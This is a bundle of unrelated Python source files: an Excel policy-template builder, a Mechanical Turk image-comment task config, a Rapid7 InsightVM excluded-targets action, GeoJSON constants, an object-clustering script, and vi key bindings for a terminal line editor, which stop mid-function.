sub_df = df.iloc[rowcol1[0]-1:rowcol2[0], rowcol1[1]:rowcol2[1]+1]
yield sub_df
def extract(df, ranges=source):
sub_dfs = dfg(df, ranges)
result = next(sub_dfs)
for sub_df in sub_dfs:
result = result.combine_first(sub_df)
return result.reindex_like(df)
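# Note on the range extraction above (explanatory comment, not original code):
# xl_cell_to_rowcol('A7') returns the zero-based (row, col) pair (6, 0), and the
# extra "-1" compensates for the header row consumed by read_excel, so a range
# such as 'A7:A15' maps to df.iloc[5:14, 0:1] -- i.e. spreadsheet rows 7..15 of
# column A, assuming the first spreadsheet row holds the column headers.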
def main():
with pd.ExcelFile(template_name) as xls:
tdf = pd.read_excel(
xls, sheet_name='01 Multi-line policy Details')
cdf = pd.read_excel(xls, sheet_name='client code')
idf = pd.read_excel(xls, sheet_name='insurer code', header=[0, 1])
vdf = pd.read_excel(xls, sheet_name='RiskName', usecols='A:D,H',
nrows=167)
tdf = tdf[0 : 1]
tdf.columns = tdf.columns.str.strip()
tdf.iloc[0] = '0_0'
tdf.at[0, 'Premium VAT Rate'] = 0.06
tdf.at[0, 'Commission Rate'] = 0.15
tdf.at[0, 'Commission VAT Rate'] = 0.06
tdf.at[0, 'Premium (VAT Excluded)'] = '[=P2/(1+N2)]'
tdf.at[0, 'Premium VAT TAX'] = '[=P2-M2]'
tdf.at[0, 'Commission (VAT Excluded)'] = '[=U2/(1+S2)]'
tdf.at[0, 'Commission VAT TAX'] = '[=R2*S2]'
tdf.at[0, 'Commission Total Amount'] = '[=P2*Q2]'
tdf.at[0, 'Income Class'] = '9.Renewal'
tdf.at[0, 'Program Type'] = '3.Locally Admitted Policies'
tdf.at[0, 'Placement Executive'] = 'No PE involved'
tdf.at[0, 'Distribution Channel'] = '1. Open Market(Non Facility)'
cdf = cdf.dropna(how='all')
from configparser import ConfigParser
config = ConfigParser()
config.read('config.ini')
# client_pat = r'(?i)China|\bCo\b\.?|Company|Ltd\.?|Limited'
# cdf['Client Name'] = cdf['Client Name'].str.replace(client_pat, '###')
idf = idf['Insurer Listing'][['Client Number', 'Insurer Name']]
for key, pattern in config['standard'].items():
idf['Insurer Name'] = idf['Insurer Name'].str.replace(pattern, ' ')
cdf['Client Name'] = cdf['Client Name'].str.replace(pattern, ' ')
cdf.rename({'Client Name': 'Client Name (Full Name)'}, axis=1, inplace=True)
idf.rename({
'Client Number': 'Insurer Code',
'Insurer Name': 'Insurer Name (Full Name)'}, axis=1, inplace=True)
vdf = extract(vdf)
vdf.rename({'Risk Name1': 'Risk'}, axis=1, inplace=True)
with pd.ExcelWriter('test/template.xlsx', engine='xlsxwriter') as writer:
tdf.to_excel(writer, 'template', index=False)
cdf.to_excel(writer, 'Client Code', index=False)
idf.to_excel(writer, 'Insurer Code', index=False)
vdf.to_excel(writer, 'valid', index=False)
tdfsheet = writer.sheets['template']
tdfsheet.set_column('B:B', 15)
tdfsheet.set_column('C:D', 30)
tdfsheet.set_column('E:E', 15)
tdfsheet.set_column('F:F', 30)
tdfsheet.set_column('G:Y', 25)
import pandas as pd
sheet_names = ['Client Code', 'Insurer Code', 'valid']
def get_dataframe(filename):
with pd.ExcelFile(filename) as xls:
for sheet_name in sheet_names:
dataframe = pd.read_excel(xls, sheet_name=sheet_name)
yield dataframe
def compare_template():
old = get_dataframe('test/oldtemplate.xlsx')
new = get_dataframe('test/template.xlsx')
for old_data, new_data, name in zip(old, new, sheet_names):
print('%s equal: %s' % (name, old_data.equals(new_data)))
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
task_config = {}
"""A short and descriptive title about the kind of task the HIT contains.
On the Amazon Mechanical Turk web site, the HIT title appears in search results,
and everywhere the HIT is mentioned.
"""
task_config['hit_title'] = 'Comment on an Image'
"""A description includes detailed information about the kind of task the HIT contains.
On the Amazon Mechanical Turk web site, the HIT description appears in the expanded
view of search results, and in the HIT and assignment screens.
"""
task_config['hit_description'] = 'You will write an engaging comment for an image.'
"""One or more words or phrases that describe the HIT, separated by commas.
On MTurk website, these words are used in searches to find HITs.
"""
task_config['hit_keywords'] = 'comment'
"""A detailed task description that will be shown on the HIT task preview page
and on the left side of the chat page. Supports HTML formatting.
"""
task_config[
'task_description'
] = '''
<h2><b>Description</b></h2>
In this task, you will be shown 5 images, and will write a comment about each image.
The goal of this task is to write something about an image that someone else would
find engaging.
<br>
<br>
<h4><b>STEP 1</b></h4> With each new photo, you will be given a <b>personality trait</b>
that you will try to emulate in your comment. For example, you might be given
"<b>snarky</b>" or "<b>glamorous</b>". The personality describes
<em><b>YOU</b></em>, not the picture. It is <em>you</em> who is snarky or
glamorous, not the contents of the image.
<br>
<br>
<h4><b>STEP 2</b></h4> You will then be shown an image, for which you will write
a comment <em>in the context of your given personality trait</em>.
Please make sure your comment has at least <b>three words</b>. Note that these are
<em>comments</em>, not captions.
<br>
<br>
E.g., you may be shown an image of a tree. If you are "<b>snarky</b>",
you might write "What a boring tree, I bet it has bad wood;" or,
if you were "<b>glamorous</b>", you might write "What an absolutely beautiful tree!
I would put this in my living room, it's so extravagant!"
<br>
<br>
NOTE: you will receive a new personality for each new image. Please do not
simply copy the personality into your comment, and <b>please try not to use
the text in the image when forming a comment</b>.
<br>
<br>
<h4><b>REWARD/BONUS</b></h4>
To complete this task, <b><span style="color:blue">you must comment on ALL 5 images.
</span></b>
If you complete the task, you will receive $0.46.
<br>
<br>
<br>
<h4><b>CLOSE WINDOW/TIMEOUT/RETURN HIT</b></h4>
Once the task has started, closing the window, timing out, or returning the HIT will
result in <b><span style="color:blue">HIT EXPIRED</span></b> and NO reward paid.
<br>
<br>
<br>
<h4><b>IMPORTANT NOTICE</b></h4>
<span style="color:blue"><b>1. Be aware the comment you enter will be made public,
so write as you would e.g. on a public social network like Twitter.</b></span>
<br>
2. Please do not reference the task or MTurk itself in the comment. Additionally,
<b>please try not to use the text in the image when forming a comment</b>.
<br>
3. We will reject HITs that do not display any sense that you have looked at the
image while forming the comment. That is, if the comment has nothing to do with the
image, we will not accept it.
<br>
4. Likewise, we will reject HITs that do not display any sense that you have
looked at the personality while forming the comment.
<br>
5. Please do not write anything that involves any level of discrimination,
racism, sexism, or offensive religious/political content; otherwise
the submission will be rejected.
<br>
<br>
<br>
If you are ready, please click "Accept HIT" to start this task.
'''
|
import komand
from .schema import UpdateSiteExcludedTargetsInput, UpdateSiteExcludedTargetsOutput, Input
# Custom imports below
from komand_rapid7_insightvm.util import endpoints
from komand_rapid7_insightvm.util.resource_helper import ResourceHelper
class UpdateSiteExcludedTargets(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='update_site_excluded_targets',
            description='Update an existing site scope of excluded IP address and hostname targets',
input=UpdateSiteExcludedTargetsInput(),
output=UpdateSiteExcludedTargetsOutput())
def run(self, params={}):
scope = params.get(Input.EXCLUDED_TARGETS)
resource_helper = ResourceHelper(self.connection.session, self.logger)
endpoint = endpoints.Site.site_excluded_targets(self.connection.console_url, params.get(Input.ID))
# Pull current site scope in order to append to list instead of overwriting
if not params.get(Input.OVERWRITE):
current_scope = resource_helper.resource_request(endpoint=endpoint,
method='get')
self.logger.info(f"Appending to current list of excluded targets")
scope.extend(current_scope['addresses'])
self.logger.info(f"Using {endpoint} ...")
response = resource_helper.resource_request(endpoint=endpoint,
method='put',
payload=scope)
return {
"id": params.get(Input.ID),
"links": response['links']
}
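# Illustrative example (assumed values, not part of the original plugin): the
# orchestrator would invoke run() with a parameter dict along these lines --
# a site ID, the excluded targets to apply, and an optional overwrite flag.
#
#     params = {
#         Input.ID: 42,
#         Input.EXCLUDED_TARGETS: ["10.0.0.5", "badhost.example.com"],
#         Input.OVERWRITE: False,
#     }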
|
"""Constants."""
from typing import TypeVar
from .feed_entry import FeedEntry
from .filter_definition import GeoJsonFeedFilterDefinition
DEFAULT_REQUEST_TIMEOUT = 10
UPDATE_OK = "OK"
UPDATE_OK_NO_DATA = "OK_NO_DATA"
UPDATE_ERROR = "ERROR"
T_FILTER_DEFINITION = TypeVar("T_FILTER_DEFINITION", bound=GeoJsonFeedFilterDefinition)
T_FEED_ENTRY = TypeVar("T_FEED_ENTRY", bound=FeedEntry)
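# Illustrative sketch (an assumption, not part of this module): these TypeVars are
# intended to parameterise a generic feed class over its filter-definition and
# feed-entry types, e.g.
#
#     class GeoJsonFeed(Generic[T_FILTER_DEFINITION, T_FEED_ENTRY]):
#         def filter_entries(
#             self, definition: T_FILTER_DEFINITION
#         ) -> list[T_FEED_ENTRY]: ...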
|
#!/usr/bin/env python
# coding: utf-8
# In[3]:
import lmdb
import sys
import numpy as np
from io import BytesIO
#sys.path.append("/dvmm-filer2/projects/AIDA/alireza/tools/AIDA-Interchange-Format/python/aida_interchange")
from rdflib import URIRef
from rdflib.namespace import ClosedNamespace
from collections import defaultdict
import pickle
from pathlib import Path
from tqdm import tqdm as std_tqdm
import time
from sklearn.cluster import DBSCAN
import multiprocessing
start = time.time()
print("hello")
from sklearn.preprocessing import normalize
import cv2
from aida_interchange import aifutils
#import dbscan
from functools import partial
tqdm = partial(std_tqdm, dynamic_ncols=True)
parent_file = sys.argv[1]
az_obj_graph = sys.argv[2]
az_obj_jpg = sys.argv[3]
az_obj_kf = sys.argv[4]
ins_img_path = sys.argv[5]
ins_kf_path = sys.argv[6]
ere_link = sys.argv[7]
dataName = sys.argv[8]
Path(dataName).mkdir(parents=True, exist_ok=True)
#hmdb_file =
# In[2]:
child = defaultdict(list)
parent = {}
file5= open(parent_file)
i = 0
for line in file5:
i+=1
if i ==1:
continue
data = line.split('\t')
child[data[2]].append(data[3])
parent[data[3]] = data[2]
#print(parent)
# In[3]:
with open(az_obj_graph, 'rb') as handle:
(kb_dict, entity_dict, event_dict) = pickle.load(handle)
entity_dic2 = defaultdict(list)
for x,y in entity_dict.items():
data = x.split('/')
#print data
entity_dic2[data[-2]].append(data[-1])
#print(entity_dic2)
#for x,y in entity_dic2.items():
# print x,y[0]
# break
# In[4]:
with open(az_obj_jpg, 'rb') as handle:
OD_result = pickle.load(handle)
# In[5]:
"""
with open(az_obj_kf, 'rb') as handle:
ODF_result = pickle.load(handle)
# In[6]:
"""
parentDic = defaultdict(list)
#import caffe
#ins_img_path = "results/instance1"
ins_img_env = lmdb.open(ins_img_path, map_size=1e11, readonly=True, lock=False)
#print(ins_img_env)
ins_img_txn = ins_img_env.begin(write=False)
lmdb_cursor = ins_img_txn.cursor()
#datum = caffe.proto.caffe_pb2.Datum()
#"""
for key, value in lmdb_cursor:
#datum.ParseFromString(value)
#data = caffe.io.datum_to_array(datum)
value = np.frombuffer(value, dtype='float32').tolist()
#print(str(key))
key = key.decode()
data = str(key).split('/')
file_id = str(data[0])
num = data[1]
#print(file_id,num)
if num in entity_dic2[file_id]:
parentDic[parent[data[0]]].append((key,value))
#print(parentDic)
#"""
"""
ins_kf_env = lmdb.open(ins_kf_path, map_size=1e11, readonly=True, lock=False)
#print(ins_img_env)
ins_kf_txn = ins_kf_env.begin(write=False)
lmdb_cursor2 = ins_kf_txn.cursor()
#datum = caffe.proto.caffe_pb2.Datum()
for key, value in lmdb_cursor2:
#datum.ParseFromString(value)
#data = caffe.io.datum_to_array(datum)
value = np.frombuffer(value, dtype='float32').tolist()
#print(str(key))
key = key.decode()
data = str(key).split('/')
file_id = str(data[0])
num = data[1]
print(file_id,num)
if num in entity_dic2[file_id]:
parentDic[parent[data[0]]].append((key,value))
print(parentDic)
"""
# In[7]:
"""
# In[8]:
# In[9]:
file1 = open('results/frame_child_e.txt')
videoDic = {}
for line in file1:
data = line.split()
videoDic[data[1]] = data[0]
# In[10]:
"""
file1 = open(ere_link)
ere_type = {}
for line in file1:
data = line.split(',')
#print data
ere_type[data[0]] = data[1]
# In[11]:
images=0
i=0
typeList = ['Weapon','Vehicle','Person','Facility']
threshold = {'Person': 0.72, 'Vehicle': 0.7, 'Weapon': 0.7, 'Facility': 0.7}
count = 0
for x, y in tqdm(parentDic.items()):
#print x
count+=1
#if count < 40:
# continue
g = aifutils.make_graph()
#g = kb_dict[parent]
cu_pref = 'http://www.columbia.edu/AIDA/DVMM/'
sys_instance_matching = aifutils.make_system_with_uri(g, cu_pref+'Systems/Instance-Matching/ResNet152')
#entityList = []
entityList = defaultdict(list)
arrayList = defaultdict(list)
keyList = defaultdict(list)
#bb_list = []
first = 1
detected = 0
for i in range(len(y)):
(key, feature) = y[i]
#print key
detected+=1
#print detected
if '_' in key:
#print key
eid = "http://www.columbia.edu/AIDA/DVMM/Entities/ObjectDetection/RUN00010/Keyframe/"+key
#if eid in entity_dict.keys():
#continue
data = key.split('/')
#print ere_type[ODF_result[data[0]][int(data[1])]['label']]
if ere_type[ODF_result[data[0]][int(data[1])]['label']] not in typeList:
continue
data2 = data[0].split('_')
arrayList[ere_type[ODF_result[data[0]][int(data[1])]['label']]].append(feature)
entityList[ere_type[ODF_result[data[0]][int(data[1])]['label']]].append(entity_dict[eid])
else:
data = key.split('/')
#print ere_type
if OD_result[data[0]][int(data[1])]['label'] not in ere_type.keys():
continue
if ere_type[OD_result[data[0]][int(data[1])]['label']] not in typeList:
continue
eid = "http://www.columbia.edu/AIDA/DVMM/Entities/ObjectDetection/RUN00010/JPG/"+key
#if eid in entity_dict.keys():
#continue
#bb_list.append(OD_result[data[0]][int(data[1])]['bbox'])
entityList[ere_type[str(OD_result[data[0]][int(data[1])]['label'])]].append(entity_dict[eid])
arrayList[ere_type[str(OD_result[data[0]][int(data[1])]['label'])]].append(feature)
matches = 0
for a, b in arrayList.items():
new_array = np.array(arrayList[a])
normed_matrix = normalize(new_array, axis=1, norm='l2')
normed_matrix_T = np.transpose(normed_matrix)
n_array = np.matmul(normed_matrix,normed_matrix_T )
db = DBSCAN(eps=0.3, min_samples=2, metric='cosine', n_jobs = 1).fit(new_array)
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
labels = db.labels_
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
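        # DBSCAN labels noise points as -1; they are excluded from the cluster
        # count above and skipped in the loop below, so only points that fall
        # into a dense cluster get linked into an AIF coreference cluster.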
if len(new_array)>1:
clusterNameDic = {}
#print n_clusters_
firstMem = [0 for i in range(n_clusters_)]
for j in range(len(labels)):
if labels[j] == -1:
continue
matches+=1
#print j
#print labels[j]
score = 1
#print firstMem
if firstMem[labels[j]] == 0:
firstMem[labels[j]] = 1
clusterNameDic[labels[j]] = aifutils.make_cluster_with_prototype(g, "http://www.columbia.edu/AIDA/DVMM/Clusters/ObjectCoreference/RUN00010/"+ a+'/'+str(labels[j]),entityList[a][j], sys_instance_matching)
#print entityList[a][j]
else:
aifutils.mark_as_possible_cluster_member(g, entityList[a][j],clusterNameDic[labels[j]], score, sys_instance_matching)
#print entityList[a][j]
#dataName = 'post_e_i_c'
#parent = x
with open(dataName+'/'+x+'.ttl', 'w') as fout:
serialization = BytesIO()
# need .buffer because serialize will write bytes, not str
g.serialize(destination=serialization, format='turtle')
fout.write(serialization.getvalue().decode('utf-8'))
end = time.time()
print(end - start)
|
from __future__ import unicode_literals
from ..enums import IncrementalSearchDirection, InputMode
from ..keys import Keys
from ..line import ClipboardData, ClipboardDataType, SelectionType, indent, unindent
from ..selection import SelectionType
from .basic import basic_bindings
from .utils import create_handle_decorator
import codecs
__all__ = (
'vi_bindings',
)
class CursorRegion(object):
"""
Return struct for functions wrapped in ``change_delete_move_yank_handler``.
"""
def __init__(self, start, end=0):
self.start = start
self.end = end
def sorted(self):
"""
Return a (start, end) tuple where start <= end.
"""
if self.start < self.end:
return self.start, self.end
else:
return self.end, self.start
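# Illustrative note (not in the original source): CursorRegion.sorted() normalises
# a possibly-reversed region, which is useful when a motion moves the cursor
# backwards. For example:
#
#     region = CursorRegion(start=5, end=2)
#     region.sorted()   # -> (2, 5)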
def vi_bindings(registry, cli_ref):
"""
Vi extensions.
# Overview of Readline Vi commands:
# http://www.catonmat.net/download/bash-vi-editing-mode-cheat-sheet.pdf
"""
basic_bindings(registry, cli_ref)
line = cli_ref().line
search_line = cli_ref().lines['search']
handle = create_handle_decorator(registry, line)
_last_character_find = [None] # (char, backwards) tuple
_search_direction = [IncrementalSearchDirection.FORWARD]
vi_transform_functions = [
# Rot 13 transformation
(('g', '?'), lambda string: codecs.encode(string, 'rot_13')),
# To lowercase
(('g', 'u'), lambda string: string.lower()),
# To uppercase.
(('g', 'U'), lambda string: string.upper()),
# Swap case.
# (XXX: If we would implement 'tildeop', the 'g' prefix is not required.)
(('g', '~'), lambda string: string.swapcase()),
]
@registry.add_after_handler_callback
def check_cursor_position(event):
"""
After every command, make sure that if we are in navigation mode, we
never put the cursor after the last character of a line. (Unless it's
an empty line.)
"""
if (
event.input_processor.input_mode == InputMode.VI_NAVIGATION and
line.document.is_cursor_at_the_end_of_line and
len(line.document.current_line) > 0):
line.cursor_position -= 1
@handle(Keys.Escape)
def _(event):
"""
Escape goes to vi navigation mode.
"""
if event.input_processor.input_mode == InputMode.SELECTION:
line.exit_selection()
event.input_processor.pop_input_mode()
else:
event.input_processor.input_mode = InputMode.VI_NAVIGATION
@handle(Keys.Up, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Arrow up in navigation mode.
"""
line.auto_up(count=event.arg)
@handle(Keys.Down, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Arrow down in navigation mode.
"""
line.auto_down(count=event.arg)
@handle(Keys.Backspace, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
In navigation-mode, move cursor.
"""
line.cursor_position += line.document.get_cursor_left_position(count=event.arg)
@handle(Keys.ControlV, Keys.Any, in_mode=InputMode.INSERT)
def _(event):
"""
Insert a character literally (quoted insert).
"""
line.insert_text(event.data, overwrite=False)
@handle(Keys.ControlN, in_mode=InputMode.INSERT)
def _(event):
line.complete_next()
@handle(Keys.ControlN, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Control-N: Next completion.
"""
line.auto_down()
@handle(Keys.ControlP, in_mode=InputMode.INSERT)
def _(event):
"""
Control-P: To previous completion.
"""
line.complete_previous()
@handle(Keys.ControlY, in_mode=InputMode.INSERT)
def _(event):
"""
Accept current completion.
"""
line.complete_state = None
@handle(Keys.ControlE, in_mode=InputMode.INSERT)
def _(event):
"""
Cancel completion. Go back to originally typed text.
"""
line.cancel_completion()
@handle(Keys.ControlP, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
CtrlP in navigation mode goes up.
"""
line.auto_up()
@handle(Keys.ControlJ, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlM, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
In navigation mode, pressing enter will always return the input.
"""
if line.validate():
line.add_to_history()
cli_ref().set_return_value(line.document)
# ** In navigation mode **
# List of navigation commands: http://hea-www.harvard.edu/~fine/Tech/vi.html
@handle('a', in_mode=InputMode.VI_NAVIGATION)
def _(event):
line.cursor_position += line.document.get_cursor_right_position()
event.input_processor.input_mode = InputMode.INSERT
@handle('A', in_mode=InputMode.VI_NAVIGATION)
def _(event):
line.cursor_position += line.document.get_end_of_line_position()
event.input_processor.input_mode = InputMode.INSERT
@handle('C', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
# Change to end of line.
# Same as 'c$' (which is implemented elsewhere.)
"""
deleted = line.delete(count=line.document.get_end_of_line_position())
if deleted:
data = ClipboardData(deleted)
line.set_clipboard(data)
event.input_processor.input_mode = InputMode.INSERT
@handle('c', 'c', in_mode=InputMode.VI_NAVIGATION)
@handle('S', in_mode=InputMode.VI_NAVIGATION)
def _(event): # TODO: implement 'arg'
"""
Change current line
"""
# We copy the whole line.
data = ClipboardData(line.document.current_line, ClipboardDataType.LINES)
line.set_clipboard(data)
# But we delete after the whitespace
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
line.delete(count=line.document.get_end_of_line_position())
event.input_processor.input_mode = InputMode.INSERT
@handle('D', in_mode=InputMode.VI_NAVIGATION)
def _(event):
deleted = line.delete(count=line.document.get_end_of_line_position())
line.set_clipboard(ClipboardData(deleted))
@handle('d', 'd', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Delete line. (Or the following 'n' lines.)
"""
# Split string in before/deleted/after text.
lines = line.document.lines
before = '\n'.join(lines[:line.document.cursor_position_row])
deleted = '\n'.join(lines[line.document.cursor_position_row: line.document.cursor_position_row + event.arg])
after = '\n'.join(lines[line.document.cursor_position_row + event.arg:])
# Set new text.
if before and after:
before = before + '\n'
line.text = before + after
# Set cursor position. (At the start of the first 'after' line, after the leading whitespace.)
line.cursor_position = len(before) + len(after) - len(after.lstrip(' '))
# Set clipboard data
line.set_clipboard(ClipboardData(deleted, ClipboardDataType.LINES))
@handle('G', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
If an argument is given, move to this line in the history (for
example, 15G). Otherwise, go to the last line of the current string.
"""
# If an arg has been given explicitly.
if event._arg:
line.go_to_history(event.arg - 1)
# Otherwise this goes to the last line of the file.
else:
line.cursor_position = len(line.text)
@handle('i', in_mode=InputMode.VI_NAVIGATION)
def _(event):
event.input_processor.input_mode = InputMode.INSERT
@handle('I', in_mode=InputMode.VI_NAVIGATION)
def _(event):
event.input_processor.input_mode = InputMode.INSERT
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
@handle('J', in_mode=InputMode.VI_NAVIGATION)
def _(event):
for i in range(event.arg):
line.join_next_line()
@handle('n', in_mode=InputMode.VI_NAVIGATION)
def _(event): # XXX: use `change_delete_move_yank_handler` and implement 'arg'
"""
Search next.
"""
line.incremental_search(_search_direction[0])
@handle('N', in_mode=InputMode.VI_NAVIGATION)
def _(event): # TODO: use `change_delete_move_yank_handler` and implement 'arg'
"""
Search previous.
"""
if _search_direction[0] == IncrementalSearchDirection.BACKWARD:
line.incremental_search(IncrementalSearchDirection.FORWARD)
else:
line.incremental_search(IncrementalSearchDirection.BACKWARD)
@handle('p', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Paste after
"""
for i in range(event.arg):
line.paste_from_clipboard()
@handle('P', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Paste before
"""
for i in range(event.arg):
line.paste_from_clipboard(before=True)
@handle('r', Keys.Any, in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Replace single character under cursor
"""
line.insert_text(event.data * event.arg, overwrite=True)
@handle('R', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Go to 'replace'-mode.
"""
event.input_processor.input_mode = InputMode.VI_REPLACE
@handle('s', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Substitute with new text
(Delete character(s) and go to insert mode.)
"""
data = ClipboardData(''.join(line.delete() for i in range(event.arg)))
line.set_clipboard(data)
event.input_processor.input_mode = InputMode.INSERT
@handle('u', in_mode=InputMode.VI_NAVIGATION)
def _(event):
for i in range(event.arg):
line.undo()
@handle('v', in_mode=InputMode.VI_NAVIGATION)
def _(event):
line.open_in_editor()
# @handle('v', in_mode=InputMode.VI_NAVIGATION)
# def _(event):
# """
# Start characters selection.
# """
# line.start_selection(selection_type=SelectionType.CHARACTERS)
# event.input_processor.push_input_mode(InputMode.SELECTION)
@handle('V', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Start lines selection.
"""
line.start_selection(selection_type=SelectionType.LINES)
event.input_processor.push_input_mode(InputMode.SELECTION)
@handle('x', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Delete character.
"""
data = ClipboardData(line.delete(count=event.arg))
line.set_clipboard(data)
@handle('x', in_mode=InputMode.SELECTION)
@handle('d', 'd', in_mode=InputMode.SELECTION)
def _(event):
"""
Cut selection.
"""
selection_type = line.selection_state.type
deleted = line.cut_selection()
line.set_clipboard(ClipboardData(deleted, selection_type))
event.input_processor.pop_input_mode()
@handle('c', in_mode=InputMode.SELECTION)
def _(event):
"""
Change selection (cut and go to insert mode).
"""
selection_type = line.selection_state.type
deleted = line.cut_selection()
line.set_clipboard(ClipboardData(deleted, selection_type))
event.input_processor.pop_input_mode()
event.input_processor.input_mode = InputMode.INSERT
@handle('y', in_mode=InputMode.SELECTION)
def _(event):
"""
Copy selection.
"""
selection_type = line.selection_state.type
deleted = line.copy_selection()
line.set_clipboard(ClipboardData(deleted, selection_type))
event.input_processor.pop_input_mode()
@handle('X', in_mode=InputMode.VI_NAVIGATION)
def _(event):
data = line.delete_before_cursor()
line.set_clipboard(data)
@handle('y', 'y', in_mode=InputMode.VI_NAVIGATION)
@handle('Y', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Yank the whole line.
"""
text = '\n'.join(line.document.lines_from_current[:event.arg])
data = ClipboardData(text, ClipboardDataType.LINES)
line.set_clipboard(data)
@handle('+', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Move to first non whitespace of next line
"""
line.cursor_position += line.document.get_cursor_down_position(count=event.arg)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
@handle('-', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Move to first non whitespace of previous line
"""
line.cursor_position += line.document.get_cursor_up_position(count=event.arg)
line.cursor_position += line.document.get_start_of_line_position(after_whitespace=True)
@handle('>', '>', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Indent lines.
"""
current_row = line.document.cursor_position_row
indent(line, current_row, current_row + event.arg)
@handle('<', '<', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Unindent lines.
"""
current_row = line.document.cursor_position_row
unindent(line, current_row, current_row + event.arg)
@handle('>', in_mode=InputMode.SELECTION)
def _(event):
"""
Indent selection
"""
selection_type = line.selection_state.type
if selection_type == SelectionType.LINES:
from_, to = line.document.selection_range()
from_, _ = line.document.translate_index_to_position(from_)
to, _ = line.document.translate_index_to_position(to)
indent(line, from_ - 1, to, count=event.arg) # XXX: why does translate_index_to_position return 1-based indexing???
event.input_processor.pop_input_mode()
@handle('<', in_mode=InputMode.SELECTION)
def _(event):
"""
Unindent selection
"""
selection_type = line.selection_state.type
if selection_type == SelectionType.LINES:
from_, to = line.document.selection_range()
from_, _ = line.document.translate_index_to_position(from_)
to, _ = line.document.translate_index_to_position(to)
unindent(line, from_ - 1, to, count=event.arg)
event.input_processor.pop_input_mode()
@handle('O', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Open line above and enter insertion mode
"""
line.insert_line_above()
event.input_processor.input_mode = InputMode.INSERT
@handle('o', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Open line below and enter insertion mode
"""
line.insert_line_below()
event.input_processor.input_mode = InputMode.INSERT
@handle('~', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Reverse case of current character and move cursor forward.
"""
c = line.document.current_char
if c is not None and c != '\n':
c = (c.upper() if c.islower() else c.lower())
line.insert_text(c, overwrite=True)
@handle('/', in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlS, in_mode=InputMode.INSERT)
@handle(Keys.ControlS, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlS, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Vi-style forward search.
"""
_search_direction[0] = direction = IncrementalSearchDirection.FORWARD
line.incremental_search(direction)
if event.input_processor.input_mode != InputMode.VI_SEARCH:
event.input_processor.push_input_mode(InputMode.VI_SEARCH)
@handle('?', in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlR, in_mode=InputMode.INSERT)
@handle(Keys.ControlR, in_mode=InputMode.VI_NAVIGATION)
@handle(Keys.ControlR, in_mode=InputMode.VI_SEARCH)
def _(event):
"""
Vi-style backward search.
"""
_search_direction[0] = direction = IncrementalSearchDirection.BACKWARD
line.incremental_search(direction)
if event.input_processor.input_mode != InputMode.VI_SEARCH:
event.input_processor.push_input_mode(InputMode.VI_SEARCH)
@handle('#', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Go to previous occurrence of this word.
"""
pass
@handle('*', in_mode=InputMode.VI_NAVIGATION)
def _(event):
"""
Go to next occurrence of this word.
"""
pass
@handle('(', in_mode=InputMode.VI_NAVIGATION)
def _(event):
# TODO: go to begin of sentence.
pass
@handle(')', in_mode=InputMode.VI_NAVIGATION)
def _(event):
# TODO: go to end of sentence.
pass
def change_delete_move_yank_handler(*keys, **kw):
"""
Register change/delete/move/yank handlers, e.g. 'dw'/'cw'/'w'/'yw'.
The decorated function should return a ``CursorRegion``.
This decorator will create the 'change', 'delete', move and yank variants,
based on that ``CursorRegion``.
"""
no_move_handler = kw.pop('no_move_handler', False)
# TODO: Also do '>' and '<' indent/unindent operators.
# TODO: Also "gq": text formatting
# See: :help motion.txt
def decorator(func):
if not no_move_handler:
@handle(*keys, in_mode=InputMode.VI_NAVIGATION)
@handle(*keys, in_mode=InputMode.SELECTION)
def move(event):
""" Create move handler. """
region = func(event)
line.cursor_position += region.start
def create_transform_handler(transform_func, *a):
@handle(*(a + keys), in_mode=InputMode.VI_NAVIGATION)
def _(event):
""" Apply transformation (uppercase, lowercase, rot13, swap case). """
region = func(event)
start, end = region.sorted()
# Transform.
line.transform_region(
line.cursor_position + start,
line.cursor_position + end,
transform_func)
# Move cursor
line.cursor_position += (region.end or region.start)
for k, f in vi_transform_functions:
create_transform_handler(f, *k)
@handle('y', *keys, in_mode=InputMode.VI_NAVIGATION)
def yank_handler(event):
""" Create yank handler. """
region = func(event)
start, end = region.sorted()
substring = line.text[line.cursor_position + start: line.cursor_position + end]
if substring:
line.set_clipboard(ClipboardData(substring))
def create(delete_only):
""" Create delete and change handlers. """
@handle('cd'[delete_only], *keys, in_mode=InputMode.VI_NAVIGATION)
def _(event):
region = func(event)
deleted = ''
if region:
start, end = region.sorted()
# Move to the start of the region.
line.cursor_position += start
# Delete until end of region.
